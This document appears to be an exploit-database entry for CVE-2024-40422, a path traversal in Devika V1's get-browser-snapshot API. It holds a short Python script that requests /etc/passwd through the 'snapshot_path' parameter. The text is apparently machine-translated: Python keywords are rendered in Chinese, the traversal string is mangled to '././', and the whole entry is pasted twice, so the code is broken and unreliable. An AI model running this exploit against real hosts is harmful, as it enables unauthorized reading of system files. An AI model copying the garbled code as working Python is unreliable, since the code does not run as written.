#利用标题: Devika V1-通过'snapshot_path'参数路径遍历
#Google Dork: N/A
#日期: 2024-06-29
#利用作者: Alperen Ergel
#Contact: @alpernae(IG/X)
#供应商homepage3360 https://devikaai.co/
#软件link: https://github.com/stitionai/devika
#版本: V1
#测试在: Windows 11 Home Edition
#CVE: CVE-2024-40422
#!/usr/bin/python
导入argparse
导入请求
DEF漏洞利用(target_url):
url=f'http://{target_url}/api/get-browser-snapshot'
params={
'snapshot_path':'././././././././etc/passwd'
}
响应=requests.get(url,params=params)
打印(响应。文本)
如果name=='__ -Main __':
Parser=argparse.argumentparser(Description='exploit目录遍历漏洞。')
parser.add_argument(' - t',' - target',help='target url(例如,target.com)',必需=true)
args=parser.parse_args()
漏洞(args.target)
#Google Dork: N/A
#日期: 2024-06-29
#利用作者: Alperen Ergel
#Contact: @alpernae(IG/X)
#供应商homepage3360 https://devikaai.co/
#软件link: https://github.com/stitionai/devika
#版本: V1
#测试在: Windows 11 Home Edition
#CVE: CVE-2024-40422
#!/usr/bin/python
导入argparse
导入请求
DEF漏洞利用(target_url):
url=f'http://{target_url}/api/get-browser-snapshot'
params={
'snapshot_path':'././././././././etc/passwd'
}
响应=requests.get(url,params=params)
打印(响应。文本)
如果name=='__ -Main __':
Parser=argparse.argumentparser(Description='exploit目录遍历漏洞。')
parser.add_argument(' - t',' - target',help='target url(例如,target.com)',必需=true)
args=parser.parse_args()
漏洞(args.target)